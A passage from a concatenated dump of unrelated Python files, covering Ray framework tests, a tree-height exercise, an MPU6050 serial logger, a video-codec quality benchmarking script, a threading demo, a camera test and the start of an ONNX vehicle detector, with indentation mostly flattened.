filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
pq.write_table(table, f, compression="lz4")
# Clean up
shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
random_name = ray.ObjectID(_random_string()).hex()
temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
"raylet_socket")
ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(ray_start_regular):
node_manager_address = None
node_manager_port = None
for client in ray.global_state.client_table():
if "NodeManagerAddress" in client:
node_manager_address = client["NodeManagerAddress"]
node_manager_port = client["NodeManagerPort"]
assert node_manager_address
assert node_manager_port
# Try to bring down the node manager:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((node_manager_address, node_manager_port))
s.send(1000 * b'asdf')
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start_regular):
@ray.remote
def f():
# 日本語 Japanese comment
return 1
assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
return x
@ray.remote
class WithConstructor(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class WithoutConstructor(object):
def set_data(self, data):
self.data = data
def get_data(self):
return self.data
class BaseClass(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class DerivedClass(BaseClass):
def __init__(self, data):
# Due to different behaviors of super in Python 2 and Python 3,
# we use BaseClass directly here.
BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
ray.init(load_code_from_local=True, num_cpus=4)
message = "foo"
# Test normal function.
assert ray.get(echo.remote(message)) == message
# Test actor class with constructor.
actor = WithConstructor.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test actor class without constructor.
actor = WithoutConstructor.remote()
actor.set_data.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test derived actor class.
actor = DerivedClass.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test using ray.remote decorator on raw classes.
base_actor_class = ray.remote(num_cpus=1)(BaseClass)
base_actor = base_actor_class.remote(message)
assert ray.get(base_actor.get_data.remote()) == message
def test_shutdown_disconnect_global_state():
ray.init(num_cpus=0)
ray.shutdown()
with pytest.raises(Exception) as e:
ray.global_state.object_table()
assert str(e.value).endswith("ray.init has been called.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**8], indirect=True)
def test_redis_lru_with_set(ray_start_object_store_memory):
x = np.zeros(8 * 10**7, dtype=np.uint8)
x_id = ray.put(x)
# Remove the object from the object table to simulate Redis LRU eviction.
removed = False
start_time = time.time()
while time.time() < start_time + 10:
if ray.global_state.redis_clients[0].delete(b"OBJECT" +
x_id.binary()) == 1:
removed = True
break
assert removed
# Now evict the object from the object store.
ray.put(x) # This should not crash.
|
tree-height.py
|
# python3
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeHeight:
def read(self):
self.n = int(sys.stdin.readline())
self.relationships = list(map(int, sys.stdin.readline().split()))
def build_tree(self):
self.nodes = {}
for child, parent in enumerate(self.relationships):
if parent == -1:
self.root = child
if parent not in self.nodes:
self.nodes[parent] = [child]
else:
self.nodes[parent].append(child)
    def compute_height_bfs(self):
        # Note: q.pop() takes items from the end of the list, so this is an
        # iterative depth-first traversal rather than a true BFS; the computed
        # maximum height is the same either way.
q = []
q.append([self.root, 1])
maxHeight = 1
while q:
parent, height = q.pop()
if parent in self.nodes:
height += 1
if height > maxHeight:
maxHeight = height
for child in self.nodes[parent]:
q.append([child, height])
return maxHeight
def main():
tree = TreeHeight()
tree.read()
tree.build_tree()
print(tree.compute_height_bfs())
threading.Thread(target=main).start()
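# Illustrative run (hypothetical stdin): for n = 5 and the parent array
# "4 -1 4 1 1", node 1 is the root, nodes 3 and 4 are its children, and
# nodes 0 and 2 hang off node 4, so the script prints a height of 3.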
|
readingMPU6050.py
|
import serial
import threading
from time import sleep
from datetime import datetime
from datetime import timedelta
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import numpy as np
#Sensor readings with offsets: -1807 -108 17042 0 4 -3
#Your offsets: -2884 -695 1213 82 -25 2
#Start signal | Packet Type | Packet Length | ... | data | ... | End signal
UART_START_SIGNAL = 0x53
UART_END_SIGNAL = 0x04
dataList = []
timeList = []
sampfreq = 200
tmax = 5
maxSamples = tmax*sampfreq
sampleCounter = 0
flagWait = True
flagAcq = True
flagPause = True
def wait_serial_bytes(how_many):
while porta.inWaiting()<how_many:
if(flagWait == False):
break
pass
def wait_start_signal():
start_signal = 0
while start_signal != UART_START_SIGNAL: #waiting start signal
wait_serial_bytes(1)
start_signal = ord(porta.read())
def inverter(y):
    # Invert the low 15 bits with XOR. The previous string-based bin() trick
    # dropped leading zeros, so large negative readings came back corrupted.
    return y ^ 0x7fff
def to_signed(num):
return -(inverter(num & 0x7fff))-1 if num & 0x8000 else num & 0x7fff
def to_uint16(MSB,LSB):
return (MSB << 8 | LSB)
def to_int16(MSB,LSB):
return to_signed(MSB << 8 | LSB)
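# Illustrative conversions (assuming the XOR-based 15-bit inverter above):
#   to_uint16(0x12, 0x34) == 0x1234
#   to_int16(0xFF, 0xFF)  == -1      # 0xFFFF as a signed 16-bit value
#   to_int16(0x80, 0x00)  == -32768  # 0x8000 as a signed 16-bit value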
def StartAcq():
porta.write('S'.encode('utf-8'))
def PauseAcq():
porta.write('E'.encode('utf-8'))
def ResumeTh():
global flagWait, flagPause
flagWait = True
flagPause = False
def PauseTh():
global flagWait, flagPause
flagPause = True
flagWait = False
def KillTh():
global flagWait, flagPause, flagAcq
flagWait = False
flagPause = True
flagAcq = False
def Save():
    # Use a context manager so the file is flushed and closed after saving.
    with open(filename, 'w') as f:
        for samples in dataList:
            for i in range(len(samples)):
                f.write(str(samples[i]))
                f.write('\t')
            f.write('\n')
def worker():
global dataList
while(flagAcq):
if(flagPause == False):
wait_start_signal()
wait_serial_bytes(1)
packet_len = ord(porta.read())
wait_serial_bytes(packet_len)
data = porta.read(packet_len)
cont = 0
dataVector = []
for i in range(packet_len/2):
dataVector.append(to_int16(ord(data[cont]),ord(data[cont+1])))
cont = cont + 2
            endByte = ord(porta.read())
if(endByte == UART_END_SIGNAL):
dataVector.append(str(datetime.now()))
dataList.append(dataVector)
print dataVector
return
filename = 'mpu6050data.txt'
portName = '/dev/ttyACM0'
baud = 38400
tout = 1
porta = serial.Serial(portName,baud,timeout=tout)
if(porta.is_open == False):
porta.open()
porta.flushInput()
porta.flushOutput()
threadAcq = threading.Thread(target=worker)
threadAcq.start()
while(1):
print '-------------------------------'
print 'Biomedical Engineering Lab'
print 'MPU 6050 Data Acquisition'
print '-------------------------------'
print 'Menu'
print '1 - New acquisition'
print '2 - Exit'
print '-------------------------------'
strkey = raw_input()
if(strkey == '1'):
StartAcq()
ResumeTh()
print 'Acquisition in process...'
print 'Stop? (y)'
while(1):
strkey = raw_input()
if(strkey == 'y'):
PauseTh()
PauseAcq()
print 'Saving file...'
Save()
del dataList[:]
del timeList[:]
break
elif(strkey == '2'):
KillTh()
porta.close()
break
|
generate_data.py
|
#!/usr/bin/env python3
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import csv
import json
import multiprocessing
import os
import pprint
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import shlex
import math
from encoder_commands import *
import binary_vars
binary_absolute_paths = {}
def find_absolute_path(use_system_path, binary):
global binary_absolute_paths
if binary in binary_absolute_paths:
return binary_absolute_paths[binary]
if use_system_path:
for path in os.environ["PATH"].split(os.pathsep):
target = os.path.join(path.strip('"'), os.path.basename(binary))
if os.path.isfile(target) and os.access(target, os.X_OK):
binary_absolute_paths[binary] = target
return target
target = os.path.join(os.path.dirname(os.path.abspath(__file__)), binary)
if os.path.isfile(target) and os.access(target, os.X_OK):
if use_system_path:
print(
"WARNING: '%s' not in PATH (using --use-system-path), falling back on locally-compiled binary."
% os.path.basename(binary))
binary_absolute_paths[binary] = target
return target
sys.exit(
"ERROR: '%s' missing, did you run the corresponding setup script?" %
(os.path.basename(binary) if use_system_path else target))
yuv_clip_pattern = re.compile(r"^(.*[\._](\d+)_(\d+).yuv):(\d+)$")
def clip_arg(clip):
(file_root, file_ext) = os.path.splitext(clip)
if file_ext == '.y4m':
width = int(
subprocess.check_output(
["mediainfo", "--Inform=Video;%Width%", clip],
encoding='utf-8'))
height = int(
subprocess.check_output(
["mediainfo", "--Inform=Video;%Height%", clip],
encoding='utf-8'))
fps = float(
subprocess.check_output(
["mediainfo", "--Inform=Video;%FrameRate%", clip],
encoding='utf-8'))
return {
'input_file': clip,
'height': height,
'width': width,
'fps': fps,
'file_type': 'y4m'
}
# Make sure YUV files are correctly formatted + look readable before actually
# running the script on them.
clip_match = yuv_clip_pattern.match(clip)
if not clip_match:
raise argparse.ArgumentTypeError(
"Argument '%s' doesn't match input format.\n" % clip)
input_file = clip_match.group(1)
if not os.path.isfile(input_file) or not os.access(input_file, os.R_OK):
raise argparse.ArgumentTypeError(
"'%s' is either not a file or cannot be opened for reading.\n" %
input_file)
return {
'input_file': clip_match.group(1),
'width': int(clip_match.group(2)),
'height': int(clip_match.group(3)),
'fps': float(clip_match.group(4)),
'file_type': 'yuv'
}
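# Illustrative clip arguments (hypothetical file names): a raw clip is passed
# as "foreman_352_288.yuv:30", with width/height parsed from the file name and
# the frame rate after the colon, while a clip such as "foreman.y4m" has its
# geometry and frame rate probed with mediainfo.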
def psnr_to_dmos(score):
    return 1 - 1 / (1 + math.exp(-0.1657 * (score - 26.19)))
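# Rough shape of the logistic mapping above: a PSNR near 26 dB maps to a DMOS
# of about 0.5, and psnr_to_dmos(40.0) comes out around 0.09, i.e. higher PSNR
# predicts lower impairment.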
def encoder_pairs(string):
pair_pattern = re.compile(r"^([\w\-]+):(\w+)$")
encoders = []
for pair in string.split(','):
pair_match = pair_pattern.match(pair)
if not pair_match:
raise argparse.ArgumentTypeError(
"Argument '%s' of '%s' doesn't match input format.\n" %
(pair, string))
if not get_encoder_command(pair_match.group(1)):
raise argparse.ArgumentTypeError(
"Unknown encoder: '%s' in pair '%s'\n" %
(pair_match.group(1), pair))
encoders.append((pair_match.group(1), pair_match.group(2)))
return encoders
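# Illustrative --encoders value (hypothetical encoder names; valid names are
# whatever get_encoder_command from encoder_commands recognizes): the string
# "libvpx:vp8,libvpx:vp9" parses to [("libvpx", "vp8"), ("libvpx", "vp9")],
# and a malformed pair or unknown encoder raises ArgumentTypeError.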
def writable_dir(directory):
if not os.path.isdir(directory) or not os.access(directory, os.W_OK):
raise argparse.ArgumentTypeError(
"'%s' is either not a directory or cannot be opened for writing.\n"
% directory)
return directory
def positive_int(num):
num_int = int(num)
if num_int <= 0:
raise argparse.ArgumentTypeError("'%d' is not a positive integer.\n" %
num)
return num_int
parser = argparse.ArgumentParser(
description='Generate graph data for video-quality comparison.')
parser.add_argument('--enable-bitrate', action='store_true')
parser.add_argument('clips',
nargs='+',
metavar='clip_WIDTH_HEIGHT.yuv:FPS|clip.y4m',
type=clip_arg)
parser.add_argument('--single-datapoint', action='store_true')
parser.add_argument('--dump-commands', action='store_true')
parser.add_argument('--enable-vmaf', action='store_true')
parser.add_argument('--encoded-file-dir', default=None, type=writable_dir)
parser.add_argument('--encoders',
required=True,
metavar='encoder:codec,encoder:codec...',
type=encoder_pairs)
parser.add_argument('--frame-offset', default=0, type=positive_int)
parser.add_argument('--num-frames', default=-1, type=positive_int)
# TODO(pbos): Add support for multiple spatial layers.
parser.add_argument('--num-spatial-layers', type=int, default=1, choices=[1])
parser.add_argument('--num-temporal-layers',
type=int,
default=1,
choices=[1, 2, 3])
parser.add_argument('--out',
required=True,
metavar='output.txt',
type=argparse.FileType('w'))
parser.add_argument('--use-system-path', action='store_true')
parser.add_argument('--workers', type=int, default=multiprocessing.cpu_count())
def prepare_clips(args, temp_dir):
clips = args.clips
y4m_clips = [clip for clip in clips if clip['file_type'] == 'y4m']
if y4m_clips:
print("Converting %d .y4m clip%s..." %
(len(y4m_clips), "" if len(y4m_clips) == 1 else "s"))
for clip in y4m_clips:
(fd, yuv_file) = tempfile.mkstemp(dir=temp_dir,
suffix=".%d_%d.yuv" %
(clip['width'], clip['height']))
os.close(fd)
with open(os.devnull, 'w') as devnull:
subprocess.check_call(
['ffmpeg', '-y', '-i', clip['input_file'], yuv_file],
stdout=devnull,
stderr=devnull,
encoding='utf-8')
clip['yuv_file'] = yuv_file
for clip in clips:
clip['sha1sum'] = subprocess.check_output(
['sha1sum', clip['input_file']], encoding='utf-8').split(' ', 1)[0]
if 'yuv_file' not in clip:
clip['yuv_file'] = clip['input_file']
        # Use integer division: frame_size is later used for byte-exact
        # seek/read offsets, which reject floats in Python 3.
        frame_size = 6 * clip['width'] * clip['height'] // 4
        input_yuv_filesize = os.path.getsize(clip['yuv_file'])
        clip['input_total_frames'] = input_yuv_filesize // frame_size
# Truncate file if necessary.
if args.frame_offset > 0 or args.num_frames > 0:
(fd, truncated_filename) = tempfile.mkstemp(dir=temp_dir,
suffix=".yuv")
blocksize = 2048 * 1024
total_filesize = args.num_frames * frame_size
with os.fdopen(fd, 'wb', blocksize) as truncated_file:
with open(clip['yuv_file'], 'rb') as original_file:
original_file.seek(args.frame_offset * frame_size)
while total_filesize > 0:
data = original_file.read(
blocksize
if blocksize < total_filesize else total_filesize)
truncated_file.write(data)
total_filesize -= blocksize
clip['yuv_file'] = truncated_filename
(fd, y4m_file) = tempfile.mkstemp(dir=temp_dir, suffix='.y4m')
os.close(fd)
with open(os.devnull, 'w') as devnull:
subprocess.check_call([
'ffmpeg', '-y', '-s',
'%dx%d' % (clip['width'], clip['height']), '-r',
str(int(clip['fps'] + 0.5)), '-pix_fmt', 'yuv420p', '-i',
clip['yuv_file'], y4m_file
],
stdout=devnull,
stderr=devnull)
clip['y4m_file'] = y4m_file
def decode_file(job, temp_dir, encoded_file):
(fd, decoded_file) = tempfile.mkstemp(dir=temp_dir, suffix=".yuv")
os.close(fd)
(fd, framestats_file) = tempfile.mkstemp(dir=temp_dir, suffix=".csv")
os.close(fd)
with open(os.devnull, 'w') as devnull:
if job['codec'] in ['av1', 'vp8', 'vp9']:
decoder = binary_vars.AOM_DEC_BIN if job[
'codec'] == 'av1' else binary_vars.VPX_DEC_BIN
subprocess.check_call([
decoder, '--i420',
'--codec=%s' % job['codec'], '-o', decoded_file, encoded_file,
'--framestats=%s' % framestats_file
],
stdout=devnull,
stderr=devnull,
encoding='utf-8')
elif job['codec'] == 'h264':
subprocess.check_call(
[binary_vars.H264_DEC_BIN, encoded_file, decoded_file],
stdout=devnull,
stderr=devnull,
encoding='utf-8')
# TODO(pbos): Generate H264 framestats.
framestats_file = None
return (decoded_file, framestats_file)
def add_framestats(results_dict, framestats_file, statstype):
with open(framestats_file) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
for (metric, value) in row.items():
metric_key = 'frame-%s' % metric
if metric_key not in results_dict:
results_dict[metric_key] = []
results_dict[metric_key].append(statstype(value))
def generate_metrics(results_dict, job, temp_dir, encoded_file):
(decoded_file, decoder_framestats) = decode_file(job, temp_dir,
encoded_file['filename'])
clip = job['clip']
temporal_divide = 2**(job['num_temporal_layers'] - 1 -
encoded_file['temporal-layer'])
temporal_skip = temporal_divide - 1
# TODO(pbos): Perform SSIM on downscaled .yuv files for spatial layers.
(fd, metrics_framestats) = tempfile.mkstemp(dir=temp_dir, suffix=".csv")
os.close(fd)
ssim_results = subprocess.check_output([
binary_vars.TINY_SSIM_BIN, clip['yuv_file'], decoded_file,
"%dx%d" % (results_dict['width'], results_dict['height']),
str(temporal_skip), metrics_framestats
],
encoding='utf-8').splitlines()
metric_map = {
'AvgPSNR': 'avg-psnr',
'AvgPSNR-Y': 'avg-psnr-y',
'AvgPSNR-U': 'avg-psnr-u',
'AvgPSNR-V': 'avg-psnr-v',
'GlbPSNR': 'glb-psnr',
'GlbPSNR-Y': 'glb-psnr-y',
'GlbPSNR-U': 'glb-psnr-u',
'GlbPSNR-V': 'glb-psnr-v',
'SSIM': 'ssim',
'SSIM-Y': 'ssim-y',
'SSIM-U': 'ssim-u',
'SSIM-V': 'ssim-v',
'VpxSSIM': 'vpx-ssim',
}
for line in ssim_results:
if not line:
continue
(metric, value) = line.split(': ')
if metric in metric_map:
results_dict[metric_map[metric]] = float(value)
elif metric == 'Nframes':
layer_frames = int(value)
results_dict['frame-count'] = layer_frames
results_dict['psnr-dmos'] = psnr_to_dmos(results_dict['avg-psnr'])
if decoder_framestats:
add_framestats(results_dict, decoder_framestats, int)
add_framestats(results_dict, metrics_framestats, float)
if args.enable_vmaf:
        # As invoked here (JSON requested with '--out-fmt json' and stdout
        # captured), the VMAF report arrives on stdout, so parse the captured
        # output directly instead of reading back a temp file that was never
        # written to.
        vmaf_results = subprocess.check_output([
            binary_vars.VMAF_BIN, 'yuv420p',
            str(results_dict['width']),
            str(results_dict['height']), clip['yuv_file'], decoded_file,
            '--out-fmt', 'json'
        ],
                                               encoding='utf-8')
        vmaf_obj = json.loads(vmaf_results)
results_dict['vmaf'] = float(vmaf_obj['VMAF score'])
results_dict['frame-vmaf'] = []
for frame in vmaf_obj['frames']:
results_dict['frame-vmaf'].append(frame['metrics']['vmaf'])
layer_fps = clip['fps'] / temporal_divide
results_dict['layer-fps'] = layer_fps
spatial_divide = 2**(job['num_spatial_layers'] - 1 -
encoded_file['spatial-layer'])
results_dict['layer-width'] = results_dict['width'] // spatial_divide
results_dict['layer-height'] = results_dict['height'] // spatial_divide
# target_bitrate_bps = job['target_bitrates_kbps'][
# encoded_file['temporal-layer']] * 1000
bitrate_used_bps = os.path.getsize(
encoded_file['filename']) * 8 * layer_fps / layer_frames
# results_dict['target-bitrate-bps'] = target_bitrate_bps
results_dict['actual-bitrate-bps'] = bitrate_used_bps
results_dict['bitrate-utilization'] = float(bitrate_used_bps)
def run_command(job, encoder_command, job_temp_dir, encoded_file_dir):
(command, encoded_files) = encoder_command
clip = job['clip']
start_time = time.time()
try:
process = subprocess.Popen(' '.join(
shlex.quote(arg) if arg != '&&' else arg for arg in command),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
encoding='utf-8',
shell=True)
except OSError as e:
return (None, "> %s\n%s" % (" ".join(command), e))
(output, _) = process.communicate()
actual_encode_ms = (time.time() - start_time) * 1000
input_yuv_filesize = os.path.getsize(clip['yuv_file'])
input_num_frames = int(input_yuv_filesize /
(6 * clip['width'] * clip['height'] / 4))
target_encode_ms = float(input_num_frames) * 1000 / clip['fps']
if process.returncode != 0:
return (None, "> %s\n%s" % (" ".join(command), output))
results = [{} for i in range(len(encoded_files))]
for i in range(len(results)):
results_dict = results[i]
results_dict['input-file'] = os.path.basename(clip['input_file'])
results_dict['input-file-sha1sum'] = clip['sha1sum']
results_dict['input-total-frames'] = clip['input_total_frames']
results_dict['frame-offset'] = args.frame_offset
# results_dict['param'] = job['param']
# results_dict['bitrate-config-kbps'] = job['target_bitrates_kbps']
results_dict['layer-pattern'] = "%dsl%dtl" % (
job['num_spatial_layers'], job['num_temporal_layers'])
results_dict['encoder'] = job['encoder']
results_dict['codec'] = job['codec']
results_dict['height'] = clip['height']
results_dict['width'] = clip['width']
results_dict['fps'] = clip['fps']
results_dict['actual-encode-time-ms'] = actual_encode_ms
results_dict['target-encode-time-ms'] = target_encode_ms
results_dict[
'encode-time-utilization'] = actual_encode_ms / target_encode_ms
layer = encoded_files[i]
results_dict['temporal-layer'] = layer['temporal-layer']
results_dict['spatial-layer'] = layer['spatial-layer']
generate_metrics(results_dict, job, job_temp_dir, layer)
if encoded_file_dir:
param = job['qp_value'] if job['param'] == 'qp' else job[
'target_bitrates_kbps'][-1]
encoded_file_pattern = "%s-%s-%s-%dsl%dtl-%d-sl%d-tl%d%s" % (
os.path.splitext(os.path.basename(clip['input_file']))[0],
job['encoder'], job['codec'], job['num_spatial_layers'],
job['num_temporal_layers'], param, layer['spatial-layer'],
layer['temporal-layer'], os.path.splitext(layer['filename'])[1])
shutil.move(layer['filename'],
os.path.join(encoded_file_dir, encoded_file_pattern))
else:
os.remove(layer['filename'])
shutil.rmtree(job_temp_dir)
return (results, output)
def find_qp():
if args.single_datapoint:
return [55]
return [35, 40, 45, 48, 53, 55]
def find_bitrates(width, height):
# Do multiples of 100, because grouping based on bitrate splits in
# generate_graphs.py doesn't round properly.
# TODO(pbos): Propagate the bitrate split in the data instead of inferring it
# from the job to avoid rounding errors.
# Significantly lower than exact value, so 800p still counts as 720p for
# instance.
pixel_bound = width * height
if pixel_bound <= 176 * 144:
return [20, 40, 60, 80, 100, 120]
if pixel_bound <= 640 * 360:
return [100, 150, 200, 250, 300, 350]
if pixel_bound <= 854 * 480:
return [125, 250, 375, 500, 625, 750]
if pixel_bound <= 1280 * 720:
return [400, 600, 800, 1000, 1200, 1400]
if pixel_bound <= 1920 * 1080:
return [800, 1200, 1600, 2000, 2400, 2800]
return [1200, 1800, 2400, 3000, 3600, 4200]
layer_bitrates = [[1], [0.6, 1], [0.45, 0.65, 1]]
def split_temporal_bitrates_kbps(target_bitrate_kbps, num_temporal_layers):
bitrates_kbps = []
for i in range(num_temporal_layers):
layer_bitrate_kbps = int(layer_bitrates[num_temporal_layers - 1][i] *
target_bitrate_kbps)
bitrates_kbps.append(layer_bitrate_kbps)
return bitrates_kbps
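# Worked example (for illustration only): for a 720p clip, find_bitrates(1280, 720)
# returns the target points [400, 600, 800, 1000, 1200, 1400] kbps. Splitting the
# 800 kbps point across three temporal layers applies the [0.45, 0.65, 1] weights:
#     split_temporal_bitrates_kbps(800, 3)  # -> [360, 520, 800]
# i.e. each temporal layer's cumulative target is a fixed fraction of the top layer's.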
def generate_jobs(args, temp_dir):
jobs = []
for clip in args.clips:
params = find_bitrates(
clip['width'],
clip['height']) if args.enable_bitrate else find_qp()
for param in params:
for (encoder, codec) in args.encoders:
job = {
'encoder': encoder,
'codec': codec,
'clip': clip,
'num_spatial_layers': args.num_spatial_layers,
'num_temporal_layers': args.num_temporal_layers,
}
if args.enable_bitrate:
job.update({
'param':
'bitrate',
'qp_value':
-1,
'target_bitrates_kbps':
split_temporal_bitrates_kbps(
param, args.num_temporal_layers)
})
else:
job.update({
'param': 'qp',
'qp_value': param,
'target_bitrates_kbps': []
})
job_temp_dir = tempfile.mkdtemp(dir=temp_dir)
(command, encoded_files) = get_encoder_command(job['encoder'])(
job, job_temp_dir)
full_command = find_absolute_path(args.use_system_path,
command[0])
command = [
full_command if word == command[0] else word
for word in command
]
jobs.append((job, (command, encoded_files), job_temp_dir))
return jobs
def start_daemon(func):
t = threading.Thread(target=func)
t.daemon = True
t.start()
return t
def job_to_string(job):
param = ":".join(str(i) for i in job['target_bitrates_kbps']
) if job['param'] == 'bitrate' else job['qp_value']
return "%s:%s %dsl%dtl %s %s" % (
job['encoder'], job['codec'], job['num_spatial_layers'],
job['num_temporal_layers'], param,
os.path.basename(job['clip']['input_file']))
def worker():
global args
global jobs
global current_job
global has_errored
global total_jobs
pp = pprint.PrettyPrinter(indent=2)
while True:
with thread_lock:
if not jobs:
return
(job, command, job_temp_dir) = jobs.pop()
(results, error) = run_command(job, command, job_temp_dir,
args.encoded_file_dir)
job_str = job_to_string(job)
with thread_lock:
current_job += 1
run_ok = results is not None
print(
"[%d/%d] %s (%s)" %
(current_job, total_jobs, job_str, "OK" if run_ok else "ERROR"))
if not run_ok:
has_errored = True
print(error)
else:
for result in results:
args.out.write(pp.pformat(result))
args.out.write(',\n')
args.out.flush()
thread_lock = threading.Lock()
def main():
global args
global jobs
global total_jobs
global current_job
global has_errored
temp_dir = tempfile.mkdtemp()
args = parser.parse_args()
prepare_clips(args, temp_dir)
jobs = generate_jobs(args, temp_dir)
total_jobs = len(jobs)
current_job = 0
has_errored = False
if args.dump_commands:
for (job, (command, encoded_files), job_temp_dir) in jobs:
current_job += 1
print("[%d/%d] %s" % (current_job, total_jobs, job_to_string(job)))
print("> %s" % " ".join(command))
print()
shutil.rmtree(temp_dir)
return 0
# Make sure commands for quality metrics are present.
find_absolute_path(False, binary_vars.TINY_SSIM_BIN)
for (encoder, codec) in args.encoders:
if codec in ['vp8', 'vp9']:
find_absolute_path(False, binary_vars.VPX_DEC_BIN)
elif codec == 'av1':
find_absolute_path(False, binary_vars.AOM_DEC_BIN)
elif codec == 'h264':
find_absolute_path(False, binary_vars.H264_DEC_BIN)
if args.enable_vmaf:
find_absolute_path(False, binary_vars.VMAF_BIN)
print("[0/%d] Running jobs..." % total_jobs)
args.out.write('[')
workers = [start_daemon(worker) for i in range(args.workers)]
[t.join() for t in workers]
args.out.write(']\n')
shutil.rmtree(temp_dir)
return 1 if has_errored else 0
if __name__ == '__main__':
sys.exit(main())
|
thread_condition.py
|
#!/usr/bin/python3
###################################
# File Name : thread_condition.py
###################################
import time
import logging
import threading
logging.basicConfig(level=logging.DEBUG, format="(%(threadName)s) %(message)s")
def receiver(condition):
logging.debug("Start receiver")
with condition:
logging.debug("Waiting...")
condition.wait()
time.sleep(1)
logging.debug("End")
def sender(condition):
logging.debug("Start sender")
with condition:
logging.debug("Send notify")
        condition.notify_all()
logging.debug("End")
def main():
condition = threading.Condition()
for i in range(5):
t = threading.Thread(target=receiver, name="receiver %s" % i, args=(condition,))
t.start()
send = threading.Thread(target=sender, name="sender", args=(condition,))
time.sleep(1)
with condition:
condition.notify(1)
time.sleep(3)
send.start()
if __name__ == "__main__":
main()
|
test_streamer.py
|
# pylint: disable=line-too-long, logging-fstring-interpolation, dangerous-default-value, import-error,redefined-outer-name, unused-argument
import os
import socket
import logging
from datetime import datetime as dt, timedelta
import threading
import time
from pathlib import Path
from tempfile import mkdtemp
from dateutil.parser import parse
import pytest
from tmv.camera import Camera
from tmv.config import OFF, ON, VIDEO
from tmv.util import LOG_FORMAT, today_at
from freezegun import freeze_time
TEST_DATA = Path(__file__).parent / "testdata"
FDT = None
def sleepless(s):
""" instead of really sleeping, just move frozen time forward """
# pytest or something used 0.01s sleeps during the test: ignore these
# or our times will get stuffed
if s > 0.1:
FDT.tick(timedelta(seconds=s))
# for _ in range(int(s * 10)):
# fdt_global.tick(timedelta(milliseconds=100))
@pytest.fixture(scope="function")
def setup_test():
os.chdir(mkdtemp())
print("Setting cwd to {}".format(os.getcwd()))
logging.basicConfig(format=LOG_FORMAT)
logging.getLogger("tmv.streamer").setLevel(logging.DEBUG)
def test_video(monkeypatch, setup_test):
c = Camera(sw_cam=True)
c.file_by_date = False
with freeze_time(parse("2000-01-01 12:00:00")) as fdt:
global FDT
FDT = fdt
real_sleep = time.sleep
monkeypatch.setattr(time, 'sleep', sleepless)
# start normally
c.mode_button.value = ON
c._interval = timedelta(seconds=60)
while dt.now() < today_at(13):
c.run(1)
fdt.tick(timedelta(seconds=1))
# switch to video mode
c.mode_button.value = VIDEO
vtd = threading.Thread(target=video_server, args=(c, fdt), daemon=True)
vtd.start()
real_sleep(3)
c.mode_button.value = OFF
vtd.join()
real_sleep(1)
        # switch to video mode again: OK
c.mode_button.value = VIDEO
vtd = threading.Thread(target=video_server, args=(c, fdt), daemon=True)
vtd.start()
real_sleep(3)
c.mode_button.value = OFF
vtd.join()
def video_server(c: Camera, fdt):
while c.mode_button.value != VIDEO:
c.run(1)
|
core.py
|
import time
import threading
import logging
from queue import Queue
from threading import Thread, Lock
import cv2
import yaml
import numpy as np
from easydict import EasyDict
from utils.general import non_max_suppression, letterbox
import keras_ocr
from sklearn.cluster import DBSCAN
import onnxruntime
logging.basicConfig(format='[%(asctime)s] %(threadName)s - %(message)s', level=logging.DEBUG)
class Detector:
def __init__(self, cfg='configs/detector_config.yaml'):
self.opt = self._load_config(cfg)
self.imgsz = self.opt.img_size
if isinstance(self.imgsz, int):
self.imgsz = [self.imgsz, self.imgsz]
self.model = onnxruntime.InferenceSession(
self.opt.weights,
providers=['TensorrtExecutionProvider', 'CUDAExecutionProvider', 'CPUExecutionProvider'])
logging.info('Load Detector model')
def _load_config(self, cfg):
with open(cfg) as f:
config = yaml.safe_load(f)
econfig = EasyDict(config)
return econfig.test
def detect(self, bgr_img, threshold = 0.4):
logging.info('Detecting trucks...')
inp = letterbox(bgr_img, new_shape=self.imgsz, stride=64, auto=False)[0]
inp = inp[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
inp = inp.astype('float32') / 255.0 # 0 - 255 to 0.0 - 1.0
inp = np.expand_dims(inp, 0)
ort_inputs = {self.model.get_inputs()[0].name: inp}
pred = self.model.run(None, ort_inputs)[0]
pred = non_max_suppression(pred, conf_thres=threshold, iou_thres=0.6)
# Process detections
det = pred[0] # detections per image
bboxes = []
scores = []
classes = []
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
_, _, height, width = inp.shape
h, w, _ = bgr_img.shape
det[:, 0] *= w/width
det[:, 1] *= h/height
det[:, 2] *= w/width
det[:, 3] *= h/height
for x1, y1, x2, y2, conf, cls in det: # x1, y1, x2, y2 in pixel format
bboxes.append((x1, y1, x2, y2))
scores.append(conf)
classes.append(cls)
logging.info('Finished detecting')
return bboxes, scores, classes
class LicensePlateDetector(object):
def __init__(self, cfg='configs/lp_detector_config.yaml'):
